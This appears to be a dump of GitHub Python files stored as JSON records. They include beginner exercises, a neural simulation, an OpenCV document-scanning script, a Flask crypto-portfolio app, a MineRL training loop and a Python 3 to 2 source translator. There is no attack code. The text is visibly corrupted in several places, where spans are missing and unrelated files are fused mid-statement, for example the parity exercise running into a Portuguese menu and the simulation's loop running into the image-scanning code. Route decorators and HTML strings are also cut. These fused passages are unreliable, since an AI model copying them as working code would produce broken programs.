})\n\n\n","repo_name":"Duralax/SALUS-ver-1","sub_path":"main/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13235972241","text":"getallenrij = [23, 35, 31, 26, 73, 75, 84, 29, 42, 46]\nminoneven = 1000\nmaxeven = 0\n\nfor getal in getallenrij:\n if getal%2 == 0 and getal>maxeven:\n maxeven=getal\n elif getal num2:\n print(f'{num1} > {num2}!')\n elif num2 > num1:\n print(f'{num2} > {num1}!')\n else:\n print(f'{num1} = {num2}!')\n elif choice == 4:\n num1 = float(input('Digite um novo primeiro número:'))\n num2 = float(input('Digite um novo segundo número:'))\n elif choice == 5:\n print('Programa Finalizado!')\n else:\n print('Opção Inválida, Digite novamente!')\n","repo_name":"Logoet/Python","sub_path":"exercises/Aula14/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74787397386","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 23 16:31:07 2019\n\n@author: davide\n\"\"\"\nimport numpy as np\nimport math\n#import random\nimport os\n\n\n\ndef main():\n\n SimulationName=\"crossing_study\"\n nl=30\n N=nl*nl\n m=1\n gammas=np.linspace(0.05,1,20)\n L=10.0\n f=0.05\n dir_flag=0 # 0= ellipse elognated along x, 1= elliple elongated along y\n order=15\n power=0\n xi=25\n\n #CREATE SIMULATION FOLDER\n if not os.path.exists(SimulationName):\n os.makedirs(SimulationName)\n \n #SAVE PARAMETERS:\n outfile=open(SimulationName+\"/parameters.txt\",\"w\")\n outfile.write(\"N=\"+str(N)+\"\\n\")\n outfile.write(\"L=\"+str(L)+\"\\n\")\n outfile.write(\"f=\"+str(f)+\"\\n\")\n outfile.close()\n \n np.save(SimulationName+\"/gammas\",gammas)\n \n for i in range(len(gammas)): \n subfolder=SimulationName+\"/gamma_\"+str(i+1)\n if not os.path.exists(subfolder):\n os.makedirs(subfolder)\n \n print(\"Starting dynamics for gamma=\"+str(gammas[i]))\n grid=RegularPfc(N,L,m) # defines environment\n np.save(subfolder+\"/pfc\",grid)\n J=BuildJ(N,grid,L,gammas[i],order,power,xi) # Builds connectivity\n #V=np.random.uniform(0,1,N)\n starting_point1=[L/2,0] # starting on bottom\n starting_point2=[0,L/2.0] # starting on left\n V=correlate_activity(grid[0],starting_point2,L)\n V=V/np.mean(V)\n Vvec=dynamics(f,V,N,J)\n np.save(subfolder+\"/Vdynamics\",Vvec)\n print(\"Dynamics terminated, result saved\")\n \n print(\"END\")\n return\n\n# FUNCTIONS\n\ndef KAx(x1,x2,L,order,power,xi):\n \n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n \n #cosine power kernel\n r=np.sqrt(pow(dx,2)+pow(dy,2))\n theta=np.arctan2(dy,dx)\n \n k_out= pow(np.cos(theta),order)\n k_out=k_out*pow(r,power)*np.exp(-pow(r,2)/xi)\n \n \n return k_out\n \ndef KAy(x1,x2,L,order,power,xi):\n \n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n \n #cosine power kernel\n r=np.sqrt(pow(dx,2)+pow(dy,2))\n theta=np.arctan2(dy,dx)+(math.pi/2.0)\n \n k_out= pow(np.cos(theta),order)\n k_out=k_out*pow(r,power)*np.exp(-pow(r,2)/xi)\n \n \n return k_out\n\ndef KS(x1,x2,L):\n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n d=np.sqrt(pow(dx,2)+pow(dy,2))\n return np.exp(-abs(d))\n \ndef KSellipse(x1,x2,L,a1,a2):\n dx=x1[0]-x2[0]\n dy=x1[1]-x2[1]\n if dx>float(L)/2.0:\n dx=dx-L\n elif dx<-float(L)/2.0:\n dx=dx+L\n if dy>float(L)/2.0:\n dy=dy-L\n elif dy<-float(L)/2.0:\n dy=dy+L\n d=np.sqrt(a1*pow(dx,2)+a2*pow(dy,2))\n return np.exp(-abs(d)) \n\n\ndef transfer(h):\n if h>0:\n return h\n else:\n return 0\n\ndef RegularPfc(N,L,m):\n Nl=int(np.sqrt(N))\n grid=np.zeros((m,N,2))\n tempgrid=np.zeros((N,2))\n for i in range(Nl):\n for j in range(Nl):\n tempgrid[i+Nl*j][0]=i*float(L)/float(Nl)\n tempgrid[i+Nl*j][1]=j*float(L)/float(Nl)\n\n for j in range(m):\n labels=np.random.permutation(N)\n for k in range(N):\n grid[j][:]=tempgrid\n\n return grid\n\ndef BuildJ(N,grid,L,gamma,order,power,xi):\n width=L/10\n J=np.zeros((N,N))\n for i in range(N):\n for j in range(N):\n for k in range(len(grid)):\n x1=grid[k][i]\n x2=grid[k][j]\n if i!=j:\n J[i][j]=J[i][j]+KS(x1,x2,L)\n if ((L/2.0-width) (rows, columns)\n src2 = src.copy()\n\n\n\n def Hough_lines(hough_lines_threshold, img, horizontal_or_vertical): # 做 霍夫直線偵測\n img = np.uint8(img)\n dst = cv.Canny(img, canny_threshold, canny_threshold, None, 3) # 霍夫直線偵測包含Canny\n\n cv.imwrite(f'{file_name}'+\"_gray_normalized_kernel_\"+f'{horizontal_or_vertical}'+\"_\"+f'{filter_size}'+\"_canny_\"+f'{canny_threshold}'+\"-\"+f'{canny_threshold}'+\".jpg\", dst) # 生成 Canny 的結果圖\n\n lines = cv.HoughLines(dst, 1, np.pi / 360, hough_lines_threshold)\n global horizontal_lines\n global vertical_lines\n if horizontal_or_vertical == \"horizontal\":\n horizontal_lines = []\n if horizontal_or_vertical == \"vertical\":\n vertical_lines = []\n if lines is not None:\n for i in range(0, len(lines)):\n rho = lines[i][0][0]\n theta = lines[i][0][1]\n a = math.cos(theta)\n b = math.sin(theta)\n x0 = (a * rho)\n y0 = (b * rho)\n pt1 = [int(x0 + 5000 * (-b)), int(y0 + 5000 * a)]\n pt2 = [int(x0 - 5000 * (-b)), int(y0 - 5000 * a)]\n if (pt1[0] - pt2[0]) == 0: # 計算直線斜率\n slope = (pt1[1] - pt2[1]) / (10**(-1)) # 避免pt1[0]-pt2[0]==0 (x的變化量),導致分母為0\n else:\n slope = (pt1[1] - pt2[1]) / (pt1[0] - pt2[0])\n if (slope < 1) and (slope > -1): # 依照斜率歸類為 水平線\n horizontal_lines.append([pt1[0],pt1[1],slope])\n cv.line(src, pt1, pt2, (0, 0, 255), 2, cv.LINE_AA)\n elif (slope > 1) or (slope < -1): # 依照斜率歸類為 垂直線\n vertical_lines.append([pt1[0],pt1[1],slope])\n cv.line(src, pt1, pt2, (0, 0, 255), 2, cv.LINE_AA)\n\n\n\n def Get_intersection_points(): # 拿直線方程式取交點\n # eq: slope*x - y = slope*x0 - y0\n global intersection_points\n intersection_points = []\n print(\"Horizontal Lines Founded:\", len(horizontal_lines))\n print(\"Vertical Lines Founded:\", len(vertical_lines))\n for horizontal_line in horizontal_lines:\n for vertical_line in vertical_lines:\n coefficient = np.array([ [horizontal_line[2],-1] , [vertical_line[2],-1] ])\n constant = np.array([ [horizontal_line[2]*horizontal_line[0]-horizontal_line[1]] , [vertical_line[2]*vertical_line[0]-vertical_line[1]] ])\n intersection_point = np.linalg.solve(coefficient,constant)\n intersection_points.append( [int(intersection_point[0][0]) , int(intersection_point[1][0])] )\n cv.circle(src, (int(intersection_point[0][0]),int(intersection_point[1][0])), 5, (255,0,0), -1)\n\n\n\n def quadrant_categorization(): # 將所有的交點分類成4個象限\n global quadrant_1_corner\n global quadrant_2_corner\n global quadrant_3_corner\n global quadrant_4_corner\n quadrant_1_corner, quadrant_2_corner, quadrant_3_corner, quadrant_4_corner = [], [], [], []\n for j in intersection_points:\n if (j[0] > nc/2) and (j[1] < nr/2):\n quadrant_1_corner.append(j)\n elif (j[0] < nc/2) and (j[1] < nr/2):\n quadrant_2_corner.append(j)\n elif (j[0] < nc/2) and (j[1] > nr/2):\n quadrant_3_corner.append(j)\n elif (j[0] > nc/2) and (j[1] > nr/2):\n quadrant_4_corner.append(j)\n\n\n\n def Find_4_corners(): # 找出4個角落點\n global hough_lines_threshold\n list_included_values = 0\n while list_included_values < 4: # while迴圈判斷:四個象限內是否都存在交點,若否,則降低Hough_lines的Threshold\n list_included_values = 0\n for quadrant in range(1, 5):\n if globals()['quadrant_'+str(f'{quadrant}')+'_corner'] == []:\n hough_lines_threshold -= 10\n print(\"Current Threshold:\", hough_lines_threshold)\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_vertical, \"vertical\")\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_horizontal, \"horizontal\")\n Get_intersection_points()\n quadrant_categorization()\n break\n else:\n list_included_values += 1\n\n def find_corner_in_each_quadrant(quadrant): # 判斷:交點是否過度貼近邊界,甚至跑到圖片外。找到符合條件且距離中心點最遠的點\n max_d = 0\n temp_corner = []\n for point in globals()['quadrant_'+str(f'{quadrant}')+'_corner']:\n if (math.sqrt((point[0]-nc/2)**2+(point[1]-nr/2)**2) > max_d) and ((nc/2)-abs(point[0]-(nc/2)) > 40) and ((nr/2)-abs(point[1]-(nr/2)) > 40) and (abs(point[0]-(nc/2))<=(nc/2)) and (abs(point[1]-(nr/2))<=(nr/2)): # (距離中心點>max_d)&(距離邊界>40px)&(點不能超出邊界)\n max_d = math.sqrt((point[0]-nc/2)**2+(point[1]-nr/2)**2)\n temp_corner = point\n return temp_corner\n\n def fine_distance_to_edge(x, y): # 判斷:交點是否位於靠近圖片外圍的區域\n if (abs(x-(nc/2)) > (nc/6)) and (abs(y-(nr/2)) > (nr/6)): # (距離中心點 > 1/6)\n return True\n else:\n return False\n\n for quadrant in range(1,5): # 做條件判斷,如果有交點不符合條件,則降低Hough_lines的Threshold,然後全部重新再算一次\n reasonable_point = False\n temp_corner = find_corner_in_each_quadrant(quadrant)\n while reasonable_point is False:\n if fine_distance_to_edge(temp_corner[0], temp_corner[1]) is True:\n corner_each_quadrant.append(temp_corner)\n reasonable_point = True\n else:\n hough_lines_threshold -= 10\n print(\"Current Threshold:\", hough_lines_threshold)\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_vertical, \"vertical\")\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_horizontal, \"horizontal\")\n Get_intersection_points()\n quadrant_categorization()\n temp_corner = find_corner_in_each_quadrant(quadrant)\n\n for corner in corner_each_quadrant: # 畫出4個角落點\n cv.circle(src, (int(corner[0]),int(corner[1])), 15, (0, 255, 0), -1)\n\n\n\n def Perspective_transform(): # 透視轉換\n pts1 = np.float32([corner_each_quadrant[0], corner_each_quadrant[1], corner_each_quadrant[2], corner_each_quadrant[3]])\n pts2 = np.float32([[corner_each_quadrant[0][0]-corner_each_quadrant[1][0], 0], [0, 0], [0, corner_each_quadrant[2][1]-corner_each_quadrant[1][1]], [corner_each_quadrant[0][0]-corner_each_quadrant[1][0], corner_each_quadrant[2][1]-corner_each_quadrant[1][1]]])\n T = cv.getPerspectiveTransform(pts1, pts2)\n img2 = cv.warpPerspective(src2, T, (corner_each_quadrant[0][0]-corner_each_quadrant[1][0], corner_each_quadrant[2][1]-corner_each_quadrant[1][1]))\n return img2\n\n\n\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_vertical, \"vertical\") # 霍夫直線偵測 找垂直線\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_horizontal, \"horizontal\") # 霍夫直線偵測 找水平線\n\n Get_intersection_points() # 拿直線方程式取交點\n\n Find_4_corners() # 找出4個角落點\n # print('4 corners:',corner_each_quadrant)\n\n # print(\"hough_lines_threshold:\", hough_lines_threshold)\n # print('Intersection Points [x, y]:', intersection_points)\n # print('Intersection Points:', len(intersection_points))\n\n img2 = Perspective_transform() # 透視轉換\n\n cv.imwrite(f'{file_name}'+\"_gray_normalized_kernel_canny_houghlines_\"+f'{canny_threshold}'+\"-\"+f'{canny_threshold}'+\"-\"+f'{hough_lines_threshold}'+\".jpg\", src) # 生成 霍夫直線偵測 的結果圖\n cv.imwrite(f'{file_name}' + \"_final_result.jpg\", img2) # 生成 透視轉換後 的結果圖\n cv.imwrite(\"images_todo\\\\results\\\\\" + f'{file_name}' + \"_final_result.jpg\", img2) # 在\"images_todo/results\"資料夾內生成 透視轉換後 的結果圖\n\n print(\"\\nHough_lines Finished.\\n\")\n print(\"\\\"\" + f'{file_name}'+ \"\\\" DONE.\\n-----\")\n return img2\n\n\nif __name__ == \"__main__\":\n start = time.time() # 記錄開始執行程式的時間\n while 1:\n if (filter_size < 5) or (filter_size % 2 == 0):\n # filter_size: 33 is default\n filter_size = int(input(\"Convolution Filter Size (n*n)\\nDefault: 33*33\\nPlease type in the n you want(odd and >=5): \")) # 使用者輸入卷積的Filter大小\n else:\n break\n for formats in image_formats: # 抓取\"images_todo\"資料夾內所有要掃描的圖片\n for file in glob.glob(\"images_todo\\\\*\"+f'{formats}', recursive=True):\n file_name = file[(file.find('\\\\')+1):]\n file_name = file_name[:file_name.find('.')]\n main(file_name) # 執行主程式\n images.append( Image.open(\"images_todo\\\\results\\\\\" + f'{file_name}' + \"_final_result.jpg\") )\n image1 = images[0]\n images.pop(0)\n image1.save(\"images_todo\\\\results\\\\\"+\"Combination_\"+f'{return_time()}'+\"_filter_\"+f'{filter_size}'+\".pdf\", save_all=True, append_images=images) # 輸出合併後的PDF檔\n print(\"Saved File:\", \"images_todo/results/\"+\"Combination_\"+f'{return_time()}'+\".pdf\") # 印出PDF檔的路徑及檔名\n end = time.time() # 記錄程式結束執行的時間\n print(\"Code Runtime: {:.1f}s\".format(end-start)) # 印出程式執行所花的時間","repo_name":"VincentLi1216/TomatoSoup","sub_path":"ImageProcessing/Hough_lines_Final_Version.py","file_name":"Hough_lines_Final_Version.py","file_ext":"py","file_size_in_byte":12817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"17089892290","text":"import pandas as pd\nimport json\n\n\ndef add_data(organisation, key, url, year):\n file_path = \"ForestOps/data.json\"\n # Load existing data from the JSON file\n with open(file_path, 'r') as f:\n data = json.load(f)\n\n # Check if the organization already exists in the data\n if organisation in data['api']:\n # Check if the key already exists in the organization\n if key in data['api'][organisation]:\n # Check if the year is different from the existing key\n if str(year) in data['api'][organisation][key]:\n print(f\"The key '{key}' already exists in the organization '{organisation}' for the year {year}.\")\n return\n\n # Add the new year and URL to the existing key\n data['api'][organisation][key][str(year)] = url\n else:\n # Add the new key, URL, and year to the organization\n data['api'][organisation][key] = {\n str(year): url\n }\n else:\n # Create a new organization and add the key, URL, and year\n data['api'][organisation] = {\n key: {\n str(year): url\n }\n }\n\n # Write the updated data back to the JSON file\n with open(file_path, 'w') as f:\n json.dump(data, f, indent=4)\n\n print(\"Data added successfully!\")\n\n\n# # Usage example\n# file_path = \"ForestOps/data.json\"\n# add_data(file_path, \"Natural England\", \"Ancient Woodland England\", \"https://example.com/ancient-woodland-2023\", 2023)\n#\n# # Usage example\n# add_data(\"Natural England\", \"Another Key\", \"https://example.com/another-key\", 2023)\n\n\ndef flatten_json(data, prefix='', rows=None, level=0):\n if rows is None:\n rows = []\n\n if isinstance(data, dict):\n for key, value in data.items():\n new_prefix = prefix + '_' + key if prefix else key\n\n if isinstance(value, dict):\n flatten_json(value, prefix=new_prefix, rows=rows, level=level + 1)\n else:\n rows.append([level, new_prefix, value])\n elif isinstance(data, list):\n for i, value in enumerate(data):\n new_prefix = prefix + '_' + str(i) if prefix else str(i)\n\n if isinstance(value, (dict, list)):\n flatten_json(value, prefix=new_prefix, rows=rows, level=level + 1)\n else:\n rows.append([level, new_prefix, value])\n\n return rows\n\ndef data_sources():\n file_path = \"ForestOps/data.json\"\n # Load the JSON data\n with open(file_path) as f:\n data = json.load(f)\n\n # Flatten the nested JSON\n rows = flatten_json(data)\n\n # Create a DataFrame from the rows\n df = pd.DataFrame(rows, columns=['Level', 'Key', 'Source'])\n\n # Split the Key column into separate columns\n df[['Source_type', 'Organisation', 'Layer', 'Year']] = df['Key'].str.split('_', expand=True)\n\n # Reorder the DataFrame columns\n df = df[['Source_type', 'Organisation', 'Layer', 'Year', 'Source']]\n\n # Sort the DataFrame by organisation, layer, and year\n df = df.sort_values(['Organisation', 'Layer', 'Year'], ascending=[True, True, True])\n\n # Reset the index of the DataFrame\n df = df.reset_index(drop=True)\n\n # Return the DataFrame\n return df\n\n\n# Usage example\n# file_path = \"ForestOps/data.json\"\n# df = display_data_as_dataframe(file_path)\n# print(df)\n\n\n# Usage example\n# df = display_data_as_dataframe()\n# print(df)\n","repo_name":"SpatialDigger/GeoOps","sub_path":"ForestOps/data_ops.py","file_name":"data_ops.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34841834356","text":"import minerl\n\nfrom backtrack import get_visibles\nfrom model import LocationModel\nfrom util.experts_util import SingularIterator\n\n\nenv_name = 'MineRLTreechop-v0'\nmodel = LocationModel()\n\nback_traj = None\nnum_trajs = 10000\niter = SingularIterator(env_name, num_trajs=num_trajs)\n\ntest_obs, test_locations, test_angles = None, None, None\n\nfor t in range(num_trajs):\n if t and t % 100 == 0:\n print(f'timestep {t}')\n\n traj = iter.get_one_traj()\n\n for i, (obs, rew, done, act) in enumerate(traj):\n if rew > 0: # acquired a wood\n back_traj = traj[:i+1]\n\n if back_traj is None:\n continue\n\n obses, locations, angles = get_visibles(back_traj)\n if not obses:\n continue\n\n test_obs, test_locations, test_angles = obses, locations, angles\n\n print('training')\n model.train(obses, locations, angles)\n back_traj = None\n\n\npred_locations, pred_angles = model.predict(test_obs)\nprint(pred_locations.mean(), ((pred_locations - test_locations) **2).mean())\n","repo_name":"albertwujj/minerl","sub_path":"item_locator/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3050860214","text":"# app.py\n# Daniel Kogan\n# Nov 14 2021\n\n# Flask Imports\nfrom flask import Flask, escape, request, render_template, session, redirect, send_file, url_for\nfrom flask import Flask\n# os\nimport os\n# wallet import\nfrom wallet import *\n\napp = Flask(__name__)\napp.secret_key = SERVERKEY\n\ndef plot_all_coins():\n pf.plotpf() # update graph\n for coin in cb.all_coin_wallets():\n cb.current_price(coin)\n pf.plotpfCoin(coin)\n pf.plotCoin(coin)\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef main():\n if request.method == \"POST\":\n print(cb.balance()) # UPDATES FIREBASE DATA\n os.remove(\"static/graph/Portfolio.png\") # refresh graph\n plot_all_coins()\n bal = str.splitlines(cb.balance())\n return render_template('main.html', bal=bal, imgsrc=\"static/graph/Portfolio.png\")\n\n# crypto pages\n@app.route('/')\ndef coin_render(coin):\n coin = coin.upper()\n print(coin)\n if coin not in cb.all_coin_wallets():\n return redirect(\"/404\")\n else:\n bal = str.splitlines(cb.balance()) \n if not (os.path.exists(f'static/graph/{coin}.png')):\n cb.current_price(coin)\n pf.plotpfCoin(coin)\n pf.plotCoin(coin)\n return render_template('main.html', bal=bal, imgsrc=f\"static/graph/{coin}.png\")\n\n@app.route('//chart', methods=['GET'])\ndef birthchart(coin): \n coin = coin.upper()\n if coin not in cb.all_coin_wallets():\n return redirect(\"/404\")\n else: \n if not os.path.exists(f'static/birthcharts/{coin}NatalChart.svg'):\n astro.create_chart(coin)\n return f\" {coin} Chart \"\n\n@app.route('/coinPostRqs', methods=[\"GET\", \"POST\"])\ndef receive():\n if request.method == \"POST\":\n coin = request.form['data']\n print(cb.balance())\n os.remove(f\"static/graph/{coin}.png\")\n plot_all_coins()\n return \"reading get request⏳\"\n\n@app.route('/404')\ndef page_not_found():\n return f\" error 404 page not found lol\"\n\nif __name__ == '__main__':\n app.run(use_reloader=True,host='0.0.0.0')\n","repo_name":"daminals/StarStruck","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"10675409665","text":"\"\"\"\nКуйвалайнен Д.А.\nkuyvalaynen@gmail.com\nЗЕБЗ-01-16\n\"\"\"\n\nfrom gdp_analyzer import GDPAnalyzer\n\nif __name__ == \"__main__\":\n gdp = GDPAnalyzer()\n try:\n gdp.load_data(filename=\"world_bank_gdp_data_2017-02-01.csv\")\n print(gdp)\n gdp.show_plot()\n except Exception as err:\n print(\"Во время работы приложения произошла ошибка:\", err)\n","repo_name":"DenisKuivalainen/Python_test","sub_path":"Level_2/Тема 12/Задание 3/Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16634803380","text":"from __future__ import print_function\n\nimport os\nimport re\n\n# List of fixers from lib3to2: absimport annotations bitlength bool\n# bytes classdecorator collections dctsetcomp division except features\n# fullargspec funcattrs getcwd imports imports2 input int intern\n# itertools kwargs memoryview metaclass methodattrs newstyle next\n# numliterals open print printfunction raise range reduce setliteral\n# str super throw unittest unpacking with\n\nALPHANUM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'\n\nKEYWORDS = set(['False', 'None', 'True', 'and', 'as', 'assert', 'break',\n 'class', 'continue', 'def', 'del', 'elif', 'else', 'except',\n 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is',\n 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return',\n 'try', 'while', 'with', 'yield'])\n\n# This regexp is used to find the tokens\ntokenProg = re.compile(\n '(#)|' +\t\t\t\t\t# Comment or\n '(' + \t\t\t\t\t\t# Begin of string group (group 1)\n '[bB]?[uU]?[rR]?' +\t\t\t# Possibly bytes, unicode, raw\n '(\"\"\"|\\'\\'\\'|\"|\\')' +\t\t# String start (triple qoutes first, group 3)\n ')|' + \t\t\t\t\t# End of string group\n '([' + ALPHANUM + '_]+)' \t# Identifiers/numbers (group 1) or\n )\n\n# regexps to find the end of a comment or string\nendProgs = {\n \"#\": re.compile(r\"\\r?\\n\"),\n \"'\": re.compile(r\"([^\\\\])(\\\\\\\\)*'\"),\n '\"': re.compile(r'([^\\\\])(\\\\\\\\)*\"'),\n \"'''\": re.compile(r\"([^\\\\])(\\\\\\\\)*'''\"),\n '\"\"\"': re.compile(r'([^\\\\])(\\\\\\\\)*\"\"\"'),\n }\n\n\nclass CancelTranslation(RuntimeError):\n pass # to cancel a translation\n\n\nclass Token:\n \"\"\" A token in the source code. The type of token can be a comment,\n string, keyword, number or identifier. It has functionality to get\n information on neighboring tokens and neighboring characters. This\n should be enough to do all necessary translations.\n \n If the ``fix`` attribute is set, that string will replace the\n current string.\n \"\"\"\n \n def __init__(self, total_text, type, start, end):\n self.total_text = total_text\n self.type = type\n self.start = start\n self.end = end\n self.fix = None\n \n def __repr__(self):\n return '' % self.text\n \n def find_forward(self, s):\n \"\"\" Find the position of a character to the right.\n \"\"\"\n return self.total_text.find(s, self.end)\n \n def find_backward(self, s):\n \"\"\" Find the position of a character to the left.\n \"\"\"\n return self.total_text.rfind(s, 0, self.start)\n \n @property\n def text(self):\n \"\"\" The original text of the token.\n \"\"\"\n return self.total_text[self.start:self.end]\n \n @property\n def prev_char(self):\n \"\"\" The first non-whitespace char to the left of this token\n that is still on the same line.\n \"\"\"\n i = self.find_backward('\\n')\n i = i if i >= 0 else 0\n line = self.total_text[i:self.start]\n line = re.sub(r\"\\s+\", '', line) # remove whitespace\n return line[-1:] # return single char or empty string\n \n @property\n def next_char(self):\n \"\"\" Get the first non-whitespace char to the right of this token\n that is still on the same line.\n \"\"\"\n i = self.find_forward('\\n')\n i = i if i >= 0 else len(self.total_text)\n line = self.total_text[self.end:i]\n line = re.sub(r\"\\s+\", '', line) # remove whitespace\n return line[:1] # return single char or empty string\n \n @property\n def indentation(self):\n \"\"\" The number of chars that the current line uses for indentation.\n \"\"\"\n i = max(0, self.find_backward('\\n'))\n line1 = self.total_text[i+1:self.start]\n line2 = line1.lstrip()\n return len(line1) - len(line2)\n \n @property\n def line_tokens(self):\n \"\"\" All (non-comment) tokens that are on the same line.\n \"\"\"\n i1, i2 = self.find_backward('\\n'), self.find_forward('\\n')\n i1 = i1 if i1 >= 0 else 0\n i2 = i2 if i2 >= 0 else len(self.total_text) \n t = self\n tokens = []\n while t.prev_token and t.prev_token.start >= i1:\n t = t.prev_token\n tokens.append(t)\n while (t.next_token and t.next_token.end <= i2 and \n t.next_token.type != 'comment'):\n t = t.next_token\n tokens.append(t)\n return tokens\n\n\nclass BaseTranslator:\n \"\"\" Translate Python code. One translator instance is used to\n translate one file.\n \"\"\"\n \n def __init__(self, text):\n self._text = text\n self._tokens = None\n \n @property\n def tokens(self):\n \"\"\" The list of tokens.\n \"\"\"\n if self._tokens is None:\n self._parse()\n return self._tokens\n \n def _parse(self):\n \"\"\" Generate tokens by parsing the code.\n \"\"\"\n self._tokens = []\n pos = 0\n \n # Find tokens\n while True:\n token = self._find_next_token(pos)\n if token is None:\n break\n self._tokens.append(token)\n pos = token.end\n \n # Link tokens\n if self._tokens:\n self._tokens[0].prev_token = None\n self._tokens[len(self._tokens)-1].next_token = None\n for i in range(0, len(self._tokens)-1):\n self._tokens[i].next_token = self._tokens[i+1]\n for i in range(1, len(self._tokens)):\n self._tokens[i].prev_token = self._tokens[i-1]\n \n def _find_next_token(self, pos):\n \"\"\" Returns a token or None if no new tokens can be found.\n \"\"\"\n \n text = self._text\n \n # Init tokens, if pos too large, were done\n if pos > len(text):\n return None\n \n # Find the start of the next string or comment\n match = tokenProg.search(text, pos)\n \n if not match:\n return None\n if match.group(1):\n # Comment\n start = match.start()\n end_match = endProgs['#'].search(text, start+1)\n end = end_match.start() if end_match else len(text)\n return Token(text, 'comment', start, end)\n elif match.group(2) is not None:\n # String - we start the search for the end-char(s) at end-1,\n # because our regexp has to allow for one char (which is\n # not backslash) before the end char(s).\n start = match.start()\n string_style = match.group(3)\n end = endProgs[string_style].search(text, match.end() - 1).end()\n return Token(text, 'string', start, end)\n else:\n # Identifier (\"a word or number\") Find out whether it is a key word\n identifier = match.group(4)\n tokenArgs = match.start(), match.end()\n if identifier in KEYWORDS:\n return Token(text, 'keyword', *tokenArgs)\n elif identifier[0] in '0123456789':\n return Token(text, 'number', *tokenArgs)\n else:\n return Token(text, 'identifier', *tokenArgs)\n \n def translate(self):\n \"\"\" Translate the code by applying fixes to the tokens. Returns\n the new code as a string.\n \"\"\"\n \n # Collect fixers. Sort by name, so at least its consistent.\n fixers = []\n for name in sorted(dir(self)):\n if name.startswith('fix_'):\n fixers.append(getattr(self, name))\n \n # Apply fixers\n new_tokens = []\n for i, token in enumerate(self.tokens):\n for fixer in fixers:\n new_token = fixer(token)\n if isinstance(new_token, Token):\n assert new_token.start == new_token.end\n if new_token.start <= token.start:\n new_tokens.append((i, new_token))\n else:\n new_tokens.append((i+1, new_token))\n \n # Insert new tokens\n for i, new_token in reversed(new_tokens):\n self._tokens.insert(i, new_token)\n \n return self.dumps()\n \n def dumps(self):\n \"\"\" Return a string with the translated code.\n \"\"\"\n text = self._text\n pos = len(self._text)\n pieces = []\n for t in reversed(self.tokens):\n pieces.append(text[t.end:pos])\n pieces.append(t.fix if t.fix is not None else t.text)\n pos = t.start\n pieces.append(text[:pos])\n return ''.join(reversed(pieces))\n \n @classmethod\n def translate_dir(cls, dirname, skip=()):\n \"\"\" Classmethod to translate all .py files in the given\n directory and its subdirectories. Skips files that match names\n in skip (which can be full file names, absolute paths, and paths\n relative to dirname). Any file that imports 'print_function'\n from __future__ is cancelled.\n \"\"\"\n dirname = os.path.normpath(dirname)\n skip = [os.path.normpath(p) for p in skip]\n for root, dirs, files in os.walk(dirname):\n for fname in files:\n if fname.endswith('.py'):\n filename = os.path.join(root, fname)\n relpath = os.path.relpath(filename, dirname)\n if fname in skip or relpath in skip or filename in skip:\n print('%s skipped: %r' % (cls.__name__, relpath))\n continue\n code = open(filename, 'rb').read().decode('utf-8')\n try:\n new_code = cls(code).translate()\n except CancelTranslation:\n print('%s cancelled: %r' % (cls.__name__, relpath))\n else:\n with open(filename, 'wb') as f:\n f.write(new_code.encode('utf-8'))\n print('%s translated: %r' % (cls.__name__, relpath))\n\n\nclass LegacyPythonTranslator(BaseTranslator):\n \"\"\" A Translator to translate Python 3 to Python 2.7.\n \"\"\"\n \n FUTURES = ('print_function', 'absolute_import', 'with_statement',\n 'unicode_literals', 'division')\n \n def dumps(self):\n return '# -*- coding: utf-8 -*-\\n' + BaseTranslator.dumps(self)\n \n def fix_cancel(self, token):\n \"\"\" Cancel translation if using `from __future__ import xxx`\n \"\"\"\n if token.type == 'keyword' and (token.text == 'from' and\n token.next_token.text == '__future__'):\n for future in self.FUTURES:\n if any([t.text == future for t in token.line_tokens]):\n # Assume this module is already Python 2.7 compatible\n raise CancelTranslation()\n \n def fix_future(self, token):\n \"\"\" Fix print_function, absolute_import, with_statement.\n \"\"\"\n \n status = getattr(self, '_future_status', 0)\n if status == 2:\n return # Done\n \n if status == 0 and token.type == 'string':\n self._future_status = 1 # docstring\n elif 